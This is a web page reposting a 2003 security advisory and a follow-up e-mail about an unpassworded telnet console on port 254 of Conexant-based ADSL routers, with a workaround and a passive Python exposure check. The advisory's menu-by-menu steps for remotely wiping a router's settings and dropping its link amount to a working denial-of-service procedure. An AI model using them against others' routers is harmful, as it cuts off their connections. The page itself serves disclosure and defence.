The following is an updated version of the vulnerabilities I found in ADSL routers based on the CX82310 chip from Conexant. My test device was an Origo ASR-8100, but there are other routers based on this chipset, which run vxWorks.
Original Bugtraq posting
(not reformatted so PGP signature isn't broken)
From theo@markettos.org.uk Sun Oct 12 19:03:43 2003
Date: Sun, 12 Oct 2003 19:03:43 +0100
From: Theo Markettos <theo@markettos.org.uk>
To: bugtraq@securityfocus.com
Subject: Origo ASR-8100 ADSL router remote factory reset
Message-ID: <20031012180343.GB15863@chiark.greenend.org.uk>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="uQr8t48UFsdbeI+V"
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
X-PGP-Key: http://www.chiark.greenend.org.uk/~theom/pubkey.asc
Status: RO
Content-Length: 4279
Lines: 144

--uQr8t48UFsdbeI+V
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Vulnerable device
-----------------

Origo ASR-8100 ADSL router
Firmware ETHADSL_USB_110502_REL10_S
Customer Software Version 110502_REL10_S
ADSL Showtime Firmware Version: 3.21
device based on Conexant CX82310-14 chipset

Vulnerability: Remote ADSL reset and permanent denial of service attack
-----------------------------------------------------------------------

The following device is able to be remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually by an operator. The attack only takes place after the device is reset - which may be some time after it has been performed. PPP authentication information is lost on reset to factory settings, so it is most likely that the device will be unable to establish a WAN link after reset.

The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP is used) its IP address to be changed.

Attack overview
---------------

A telnet-style configuration interface is left open to WAN interface on port 254, without a password being set. This menu system is very easily driven by a remote attacker. A full exploit is given below.

Workaround
----------

Forwarding external port 254 to an internal port that is unused prevents access to the configuration interface.

With the web configuration interface at http://router-ip/doc/advance.htm click on Configuration: Virtual server

Enter a new entry:
Public port: 254
Private port: 9876
TCP
Host IP address: 127.0.0.1

Click 'Add this setting', then do Configuration: Save Settings/Reboot and click 'Save & Reboot'

Exploit details
---------------

=46rom any Internet connected host:

telnet254

Returns a menu:

01/01/99 CONEXANT SYSTEMS, INC.=20
00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 =
=20
=20

You are prompted for a LOGIN PASSWORD>
Just press return

Brings up MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
=20
4. REMOTE LOGON
=20

Press 1 - get to SYSTEM STATUS AND CONFIGURATION
1. SYSTEM INFORMATION
2. SYSTEM CONFIGURATION

Press 2 - get to SYSTEM CONFIGURATION
1. CHANGE SYSTEM TIME
2. CHANGE SYSTEM DATE
3. CHANGE PASSWORD
4. FACTORY DEFAULT CONFIGURATION

Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't seem to work)

Type 4:
Prompt: This will reset all the configurations and the ADSL modem. Are you sure?(Y/N)
Type Y:
Message: NVRAM updated

This does not reset the ADSL modem, only clears the NVRAM. This takes effect the next time the modem is reset: the admin password is reset to that printed in the documentation, and the ADSL username/password are reset, meaning the connection is down permanently until a human sets them up again. Any other settings (security etc) are also lost.

=46rom main menu, type 2 to get to ADSL MENU
1. ADSL PERFORMANCE STATUS
2. 24 HOUR ADSL PERFORMANCE HISTORY
3. 7 DAY ADSL PERFORMANCE HISTORY
4. ADSL ALARM HISTORY
5. ADSL TRANSCEIVER CONFIGURATION MENU
6. ADSL LINK RESET

Type 6:
Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y.

The ADSL link is reset and a new WAN IP address is requested by DHCP (if the ISP uses it).

Vendor notification
-------------------

UK support for Vendor (support@adsltech.com) was notified on 30th August 2003 - entirety of reply message was 'Thanks a lot'. Vendor doesn't advertise an email address so were notified via web form on that date - no response received. To date the vendor has not advertised any patches or new firmware.

--=20
Theo Markettos theo@markettos.org.uk
Clare Hall, Cambridge theom@chiark.greenend.org.uk
CB3 9AL, UK http://www.markettos.org.uk/

--uQr8t48UFsdbeI+V
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE/iZd/+ASNqdJKcxMRAlE2AJ9q/jpW178eHqeuD1li2cRUmvJUmgCgqqjN
J9mAoV0MhjAzln8P0y9FvkE=
=IOQE
-----END PGP SIGNATURE-----

--uQr8t48UFsdbeI+V--
Further updates
Chris Drake writes:
Date: Wed, 11 Feb 2004 23:28:04 +1100
From: Chris Drake
Message-ID: <6850315687.20040211232804@pobox.com>
To: theo@markettos.org.uk
Subject: Correction for: Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack

Hi Theo,

Your article here:-
http://www.securiteam.com/securitynews/6Y00N0U8KG.html

Contains some incorrect information. Specifically - the bit:-

3. CHANGE PASSWORD (Option 3 doesn't work)

The password can actually be set. Here is how:-

1. telnet to the device.
2. push <ctrl-]> to bring up the telnet menu
3. type:- mode character <enter>
4. go to the password change menu, and change the password, but DON'T use the <enter> key - instead - use <ctrl-J>

eg: to set the default password (from an insecure shipped product that already has no password in it, the user needs to push these buttons in order (being careful not to press <enter> at all):-

1 2 3 <ctrl-J> newpassword <ctrl-J> newpassword <ctrl-J>

-----------------------------------------------------------------------

Secondly - the "workaround" you describe only works when the user has NAT turned on. If (like me) the user has multiple "real" internet IP addresses, port-forwarding cannot be switched on (it does nothing, of course, since port-forwarding without NAT makes no sense). So - my above fix is necessary for these people.

Finally - you make no mention of port 255. Like 254, this port is also open and accepts device connections. Unlike port 254, it's not a character session, so this "undocumented" interface could be doing anything - and probably is doing stuff that doesn't need passwords to mess up your modem :-(

I thought you might like to update your page, since it's top in Google for these kinds of problems. It's not restricted to the model of ADSL device you mention - there are dozens of different brands running the same software all with the same problem...

Kind Regards,
Chris Drake
http://adsltech.7host.com/forum/forum_posts.asp?TID=146&PN=1 also has some different advice on locking down the router - I have not tried this. Apparently the new firmware from Origo fixes this vulnerability.
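To confirm that the port-forward workaround or new firmware has actually closed the console, the following check connects to ports 254 and 255, sends nothing, and looks for the greeting strings quoted in the posting. It is an added example, not part of the original page or either e-mail; the function names, timeout and verdict strings are assumptions made for illustration, and it is meant to be run from a host on the WAN side against your own router's address.

```python
"""Passive reachability check for the console ports named on this page."""
import socket
import sys

PORTS = (254, 255)  # 254: menu console (posting); 255: second open port (Chris Drake's mail)
# Strings the posting quotes from the port-254 greeting.
BANNER_MARKERS = (b"CONEXANT SYSTEMS", b"LOGIN PASSWORD")

def probe(host, port, timeout=3.0):
    """Connect once, send nothing, return (state, bytes received)."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:                      # refused, filtered, unreachable
        return "closed", b""
    data = b""
    with sock:
        try:
            while len(data) < 2048:
                chunk = sock.recv(512)
                if not chunk:            # peer closed without (more) data
                    break
                data += chunk
                if any(m in data for m in BANNER_MARKERS):
                    break
        except OSError:                  # read timeout or reset: keep what we have
            pass
    return "open", data

def classify(state, banner):
    """Turn a probe result into a verdict string (wording is this example's own)."""
    if state == "closed":
        return "not reachable"
    if any(m in banner for m in BANNER_MARKERS):
        return "EXPOSED: Conexant console banner"
    return "open: unidentified service"

def check_router(host, ports=PORTS, timeout=3.0):
    """Map each port to a verdict string."""
    return {p: classify(*probe(host, p, timeout)) for p in ports}

if __name__ == "__main__":
    target = sys.argv[1]                 # WAN address of the router being verified
    for port, verdict in check_router(target).items():
        print(f"{target}:{port}  {verdict}")
```

Because the check never answers the password prompt, it reports only whether the console is reachable, not whether a password has been set. Port 255 is not a character session, so it can only be reported as open or not reachable.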
Page by Theo Markettos (email at theo [at@] markettos.org.uk), last modified 2004-02-12